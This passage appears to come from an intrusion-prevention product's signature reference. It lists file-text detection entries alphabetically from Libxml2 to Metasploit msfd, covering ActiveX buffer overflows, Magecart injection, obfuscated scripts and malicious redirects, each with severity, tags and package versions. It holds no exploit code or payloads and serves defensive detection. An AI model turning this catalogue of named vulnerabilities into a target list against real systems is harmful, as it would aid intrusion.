File-Text_Libxml2-Xml-File-Processing-Long-Entity-Name-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in XMLSoft Libxml2 detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Libxml2, CVE2008, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-585-5211
Last changed: sgpkg-ips-830-5242
Vulnerability: Multiple-Products-Libxml2-Xml-File-Processing-Long-Entity-Name-Buffer-Overflow
Description:
Back to top

File-Text_Libyaml-Scanner-YAML_Parser_Scan_URI_escapes-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in LibYAML LibYAML detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, LibYAML, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-574-5211
Last changed: sgpkg-ips-574-5211
Vulnerability: Libyaml-Scanner-YAML_Parser_Scan_URI_escapes-Heap-Buffer-Overflow
Description:
Back to top

File-Text_LightOpenCMS-Smarty.php-Local-File-Inclusion

About this situation: An attempt to exploit a vulnerability in LightOpenCMS detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, LightOpenCMS, CVE2009, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1793-5242
Last changed: sgpkg-ips-1793-5242
Vulnerability: LightOpenCMS-Smarty.php-Local-File-Inclusion
Description:
Back to top

File-Text_Linux-Kernel-Netfilter-Iptables-Restore-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Netfilter Core Team iptables detected
Context: Text File Stream
Severity: 7
Tags: Linux, Any Hardware, CVE2019, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1178-5242
Last changed: sgpkg-ips-1695-5242
Vulnerability: Linux-Kernel-Netfilter-Iptables-Restore-Stack-Based-Buffer-Overflow
Description:
Back to top

File-Text_Liquid-XML-Studio-LtXmlComHelp8.dll-ActiveX-OpenFile-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in Liquid XML Studio software detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Liquid Technologies XML Studio, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: Liquid-XML-Studio-LtXmlComHelp8.dll-ActiveX-OpenFile-Buffer-Overflow
Description:
Back to top

File-Text_Logitech-VideoCall-WebCamXMP-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Logitech VideoCall ActiveX control detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Logitech VideoCall, CVE2007, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-573-5211
Vulnerability: Logitech-VideoCall-WebCamXMP-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_Logsign-Unified-Secops-Authentication-Failure

About this situation: A failed Logsign Unified SecOps authentication attempt detected
Context: Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Logsign Unified SecOps, CVE2025, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-1846-5242
Last changed: sgpkg-ips-1846-5242
Vulnerability: Logsign-Unified-Secops-Authentication-Failure
Description:
Back to top

File-Text_Logsign-Unified-Secops-Platform-Missing-Authentication-CVE-2024-5721

About this situation: An attempt to exploit a vulnerability in Logsign Unified SecOps detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Logsign, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1768-5242
Last changed: sgpkg-ips-1768-5242
Vulnerability: Logsign-Unified-Secops-Platform-Missing-Authentication-CVE-2024-5721
Description:
Back to top

File-Text_Long-Domain-Name-In-HREF

About this situation: Suspiciously long domain name in href
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, AOL, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-1751-5242
Vulnerability: AOL-Desktop-Rtx-File-Parsing-Buffer-Overflow
Description:
Back to top

File-Text_Lotus-Domino-Web-Access-ActiveX-Control-Server-Name-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Lotus Domino was detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Lotus Domino, Windows not specific, Lotus Domino not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-635-5211
Vulnerability: Lotus-Domino-Web-Access-ActiveX-Control-Server-Name-Buffer-Overflow
Description:
Back to top

File-Text_Lotus-Notes-URI-Handler-Argument-Injection

About this situation: An attempt to exploit a vulnerability in Lotus Notes detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Lotus Notes, CVE2004, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-431-4219
Vulnerability: Lotus-Notes-URI-Handler-Argument-Injection
Description:
Back to top

File-Text_Lotus-Quickr-Qp2.cab-ActiveX-Control-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Lotus Quickr for Domino detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Lotus Quickr, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-546-5211
Last changed: sgpkg-ips-552-5211
Vulnerability: IBM-Lotus-Quickr-Qp2.cab-ActiveX-Control-Integer-Overflow
Description:
Back to top

File-Text_MacOS-Gatekeeper-Check-Bypass-CVE-2021-30657

About this situation: An attempt to exploit a vulnerability in macOS Gatekeeper
Context: Text File Stream
Severity: 7
Tags: Mac OS, Any Hardware, CVE2021, Mac OS not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1352-5242
Last changed: sgpkg-ips-1352-5242
Vulnerability: MacOS-Gatekeeper-Check-Bypass-CVE-2021-30657
Description:
Back to top

File-Text_Macromedia-Flash-Player-LoadMovie-DoS

About this situation: An attempt to exploit a vulnerability in Adobe Systems Macromedia Flash Player detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Macromedia-Flash-Player-LoadMovie-DoS
Description:
Back to top

File-Text_Macromedia-Shockwave-mwdir.dll-ActiveX-Control-Buffer-Overflow

About this situation: Detected an access to vulnerabile methods of Macromedia Shockwave ActiveX control
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Macromedia Shockwave, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: Macromedia-Shockwave-mwdir.dll-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_Macromedia-Shockwave-swdir.dll-ActiveX-Control-Denial-Of-Service-CVE-2006-6885

About this situation: An attempt exploit a vulnerability in Macromedia Shockwave detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Macromedia Shockwave, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-590-5211
Last changed: sgpkg-ips-1623-5242
Description:
Back to top

File-Text_Macrovision-InstallShield-Update-Service-ActiveX-Code-Execution

About this situation: An attempt to exploit a vulnerability in Macrovision Update Service detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Macrovision Update Service, Macrovision InstallShield, Macrovision FLEXnet Connect, CVE2007, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-456-5211
Vulnerability: Macrovision-InstallShield-Update-Service-ActiveX-Code-Execution
Description:
Back to top

File-Text_Macrovision-InstallShield-Update-Service-Agent-ActiveX

About this situation: An attempt to exploit a vulnerability in Macrovision InstallShield Update Service detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Macrovision Update Service, Macrovision InstallShield, Macrovision FLEXnet Connect, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-573-5211
Vulnerability: Macrovision-InstallShield-Update-Service-Agent-ActiveX-Memory-Corruption
Description:
Back to top

File-Text_Macrovision-InstallShield-Update-Service-Isusweb.dll-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Macrovision Update Service detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Macrovision Update Service, Macrovision InstallShield, Macrovision FLEXnet Connect, CVE2007, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-870-5242
Vulnerability: HTTP_Macrovision-InstallShield-Update-Service-Isusweb.dll-Remote-Buffer-Overflow
Description:
Back to top

File-Text_Magecart-Beacon

About this situation: Magecart code injected into a website
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1274-5242
Last changed: sgpkg-ips-1274-5242
Vulnerability: Magecart-Code-Injection
Description:
Back to top

File-Text_Magecart-Beacon-2

About this situation: Magecart code detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1373-5242
Last changed: sgpkg-ips-1373-5242
Vulnerability: Magecart-Code-Injection
Description:
Back to top

File-Text_Magecart-Beacon-3

About this situation: Magecart malware detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1380-5242
Last changed: sgpkg-ips-1380-5242
Vulnerability: Magecart-Code-Injection
Description:
Back to top

File-Text_Magecart-Beacon-4

About this situation: Magecart code detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1393-5242
Last changed: sgpkg-ips-1393-5242
Vulnerability: Magecart-Code-Injection
Description:
Back to top

File-Text_Magento-API-Unserialize-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Magento Magento detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Magento, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-1271-5242
Vulnerability: Magento-API-Unserialize-Remote-Code-Execution
Description:
Back to top

File-Text_Magnetosoft-AddDestinationEntry-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Magnetosoft detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Magnetosoft, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-584-5211
Last changed: sgpkg-ips-584-5211
Description:
Back to top

File-Text_Magnetosoft-DNS-DNSLookupHostWithServer-ActiveX-Control-Format-String

About this situation: An attempt to exploit a vulnerability in Magnetosoft detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Magnetosoft, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-584-5211
Last changed: sgpkg-ips-584-5211
Description:
Back to top

File-Text_Magnetosoft-NetResources-NetConnectionEnum-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Magnetosoft detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Magnetosoft, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-584-5211
Last changed: sgpkg-ips-584-5211
Description:
Back to top

File-Text_Magnetosoft-NetResources-NetFileClose-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Magnetosoft detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Magnetosoft, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-584-5211
Last changed: sgpkg-ips-584-5211
Description:
Back to top

File-Text_Magnetosoft-NetResources-NetSessionDel-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Magnetosoft detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Magnetosoft, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-584-5211
Last changed: sgpkg-ips-584-5211
Description:
Back to top

File-Text_Magnetosoft-NetResources-NetShareEnum-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Magnetosoft detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Magnetosoft, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-584-5211
Last changed: sgpkg-ips-584-5211
Description:
Back to top

File-Text_Magnetosoft-SNTP-SntpGetReply-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Magnetosoft detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Magnetosoft, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-584-5211
Last changed: sgpkg-ips-584-5211
Description:
Back to top

File-Text_Magnetosoft-SNTP-SntpSendRequest-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Magnetosoft detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Magnetosoft, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-584-5211
Last changed: sgpkg-ips-584-5211
Description:
Back to top

File-Text_Mail-Script-Body

About this situation: Detected script in email
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-870-5242
Description:
Back to top

File-Text_Malicious-Function-Name-In-Script

About this situation: A script calls a malicious function
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1179-5242
Last changed: sgpkg-ips-1179-5242
Description:
Back to top

File-Text_Malicious-Iframe-2

About this situation: Suspicious iframe element detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-851-5242
Last changed: sgpkg-ips-851-5242
Vulnerability: Generic-Malicious-Iframe
Description:
Back to top

File-Text_Malicious-Internet-Shortcut-File

About this situation: A malicious internet shortcut file was detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1068-5242
Last changed: sgpkg-ips-1832-5242
Vulnerability: Malicious-Internet-Shortcut-File
Description:
Back to top

File-Text_Malicious-Java-Applet-Reference

About this situation: A reference to a malicious Java Applet detected
Context: Text File Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Malicious-Java-Applet-Reference
Description:
Back to top

File-Text_Malicious-Metasploit-Function-In-Script

About this situation: A script calls a malicious function
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1128-5242
Last changed: sgpkg-ips-1128-5242
Description:
Back to top

File-Text_Malicious-Obfuscated-JavaScript-VBScript-Detected

About this situation: Malicious obfuscated JavaScript and VBScript, leading to malware download was detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1371-5242
Last changed: sgpkg-ips-1476-5242
Vulnerability: Malicious-Obfuscation-JavaScript-VBScript-HTML
Description:
Back to top

File-Text_Malicious-Obfuscated-Reversed-PowerShell-Detected

About this situation: Malicious obfuscated script, with reversed PowerShell keywords, detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1375-5242
Last changed: sgpkg-ips-1375-5242
Vulnerability: Malicious-Obfuscation-Reversed-PowerShell
Description:
Back to top

File-Text_Malicious-Obfuscated-Script-File

About this situation: Detected a malicious obfuscated script file
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-830-5242
Last changed: sgpkg-ips-830-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_Malicious-Script-Blogspot-A-Detected

About this situation: Malicious script, most likely on Blogspot page, leading to malware download was detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1386-5242
Last changed: sgpkg-ips-1386-5242
Vulnerability: Blogspot-Malicious-Script-HTML
Description:
Back to top

File-Text_Malicious-Script-Blogspot-Detected

About this situation: Malicious script, most likely on Blogspot page, leading to malware download was detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1369-5242
Last changed: sgpkg-ips-1369-5242
Vulnerability: Blogspot-Malicious-Script-HTML
Description:
Back to top

File-Text_Malicious-VBScript-Detected

About this situation: Malicious VBScript Detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1056-5242
Last changed: sgpkg-ips-1056-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_Malicious-VBScript-Execution

About this situation: Malicious VBScript detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1089-5242
Last changed: sgpkg-ips-1793-5242
Vulnerability: Malicious-VBScript-Execution
Description:
Back to top

File-Text_Malicious_Download_Redirect

About this situation: Malicious redirection was detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1377-5242
Last changed: sgpkg-ips-1377-5242
Vulnerability: Malicious_Download_Redirect
Description:
Back to top

File-Text_Malicious_Redirection_Detected

About this situation: Malicious redirection was detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1232-5242
Last changed: sgpkg-ips-1248-5242
Vulnerability: Malicious_Redirection_Detected
Description:
Back to top

File-Text_Malicious_Redirection_Detected-2

About this situation: Malicious redirection was detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1253-5242
Last changed: sgpkg-ips-1253-5242
Vulnerability: Malicious_Redirection_Detected
Description:
Back to top

File-Text_Malicious_Redirection_Detected-3

About this situation: Malicious redirection was detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1253-5242
Last changed: sgpkg-ips-1253-5242
Vulnerability: Malicious_Redirection_Detected
Description:
Back to top

File-Text_Malicious_Redirection_Detected-4

About this situation: Malicious redirection was detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1253-5242
Last changed: sgpkg-ips-1253-5242
Vulnerability: Malicious_Redirection_Detected
Description:
Back to top

File-Text_Malicious_Redirection_Detected-5

About this situation: Malicious redirection was detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1253-5242
Last changed: sgpkg-ips-1503-5242
Vulnerability: Malicious_Redirection_Detected
Description:
Back to top

File-Text_Malicious_Redirection_EtterSilent_Detected

About this situation: Malicious redirection to possible EtterSilent payload was detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1343-5242
Last changed: sgpkg-ips-1343-5242
Vulnerability: EtterSilent-Malware-Infection-Traffic
Description:
Back to top

File-Text_Malicious_Scripting-From-Unresolved-Hostname

About this situation: A suspicious script from an unresolved hostname was seen
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-867-5242
Last changed: sgpkg-ips-867-5242
Description:
Back to top

File-Text_Malwarebytes-Anti-Malware-URI-Handler-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Malwarebytes Anti-Malware detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Malwarebytes Anti-Malware, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1156-5242
Last changed: sgpkg-ips-1156-5242
Vulnerability: Malwarebytes-Anti-Malware-URI-Handler-Remote-Code-Execution
Description:
Back to top

File-Text_Mapurltozone-Security-Feature-Bypass-CVE-2025-21247

About this situation: An attempt to exploit a vulnerability in Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2025-03, CVE2025, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1847-5242
Last changed: sgpkg-ips-1847-5242
Vulnerability: Mapurltozone-Security-Feature-Bypass-CVE-2025-21247
Description:
Back to top

File-Text_McAfee-Epolicy-Orchestrator-SiteManager-ActiveX-ExportSiteList-BOF

About this situation: Buffer overflow exploit against the McAfee SiteManager.DLL ActiveX control detected
Context: Text File Stream
Severity: 7
Tags: Windows, x86, McAfee ProtectionPilot, McAfee ePolicy Orchestrator, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-720-5211
Vulnerability: HTTP-McAfee-Epolicy-Orchestrator-SiteManager-ActiveX-ExportSiteList-BOF
Description:
Back to top

File-Text_McAfee-Epolicy-Orchestrator-SiteManager-ActiveX-VerifyPackageCatalog

About this situation: Buffer overflow exploit against the McAfee SiteManager.DLL ActiveX control detected
Context: Text File Stream
Severity: 7
Tags: Windows, x86, McAfee ProtectionPilot, McAfee ePolicy Orchestrator, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-720-5211
Vulnerability: HTTP-McAfee-Epolicy-Orchestrator-SiteManager-ActiveX-VerifyPackageCatalog-BOF
Description:
Back to top

File-Text_McAfee-FreeScan-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Mcafee FreeScan detected
Context: Text File Stream
Severity: 7
Tags: Windows XP, Any Hardware, McAfee FreeScan, Windows XP not specific, Suspected Disclosure, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-637-5211
Vulnerability: McAfee-FreeScan-Information-Disclosure
Description:
Back to top

File-Text_McAfee-NeoTrace-ActiveX-Control-TraceTarget-Method-Buffer-Overflow

About this situation: Detected attempt to use vulnerable method of sasatl ActiveX component of Zenturi ProgramChecker
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, McAfee NeoTrace, CVE2006, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: McAfee-NeoTrace-ActiveX-Control-TraceTarget-Method-Buffer-Overflow
Description:
Back to top

File-Text_McAfee-Security-Center-Mcinsctl.dll-ActiveX-Control-File-Overwrite

About this situation: An attempt to exploit a vulnerability in McAfee Personal Firewall Plus detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, McAfee Security Center, CVE2005, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-576-5211
Vulnerability: McAfee-Security-Center-Mcinsctl.dll-ActiveX-Control-File-Overwrite
Description:
Back to top

File-Text_McAfee-Subscription-Manager-ActiveX-Buffer-Overflow

About this situation: Detects HTML pages instantiating a COM object related to McAfee subscription manager
Context: Text File Stream
Severity: 7
Tags: Windows, x86, McAfee Security Center, CVE2006, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: HTTP-McAfee-Subscription-Manager-ActiveX-Buffer-Overflow
Description:
Back to top

File-Text_McAfee-Virtual-Technician-ActiveX-Control-Insecure-Method-Exposure

About this situation: An attempt to exploit a vulnerability in McAfee Virtual Technician detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, McAfee ePolicy Orchestrator, McAfee Virtual Technician, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-523-5211
Last changed: sgpkg-ips-551-5211
Vulnerability: McAfee-Virtual-Technician-ActiveX-Control-Insecure-Method-Exposure
Description:
Back to top

File-Text_McAfee-Virtual-Technician-Mvt.mvtcontrol-ActiveX-Insecure-Method

About this situation: An attempt to exploit a vulnerability in McAfee Virtual Technician detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, McAfee Virtual Technician, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-451-4333
Last changed: sgpkg-ips-551-5211
Vulnerability: McAfee-Virtual-Technician-Mvt.mvtcontrol-ActiveX-Insecure-Method
Description:
Back to top

File-Text_Media-Foundation-Memory-Corruption-CVE-2018-8251

About this situation: An attempt to exploit a vulnerability in Windows Media Foundation detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-06, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1075-5242
Vulnerability: Media-Foundation-Memory-Corruption-CVE-2018-8251
Description:
Back to top

File-Text_MediaWiki-SyntaxHighlight-Extension-Option-Injection-Vulnerability

About this situation: A MediaWiki SyntaxHighlight Extension Option Injection vulnerability
Context: Text File Stream
Severity: 7
Tags: Windows, Linux, Mac OS X, Any Hardware, MediaWiki, CVE2017, Windows not specific, Linux not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1023-5242
Last changed: sgpkg-ips-1023-5242
Vulnerability: MediaWiki-SyntaxHighlight-Extension-Option-Injection-Vulnerability
Description:
Back to top

File-Text_Metabase-Remote-Code-Execution-CVE-2023-38646

About this situation: An attempt to exploit a vulnerability in Metabase detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Metabase, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1617-5242
Last changed: sgpkg-ips-1617-5242
Vulnerability: Metabase-Remote-Code-Execution-CVE-2023-38646
Description:
Back to top

File-Text_Metasploit-JavaScript-Encryption

About this situation: An HTML obfuscation method used by Metasploit detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Metasploit-JavaScript-Encryption
Description:
Back to top

File-Text_Metasploit-JavaScript-Escape-Evasion

About this situation: An HTML evasion method used by Metasploit detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Metasploit-JavaScript-Escape-Evasion
Description:
Back to top

File-Text_Metasploit-msfd-Browser-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Metasploit msfd detected
Context: Text File Stream
Severity: 7
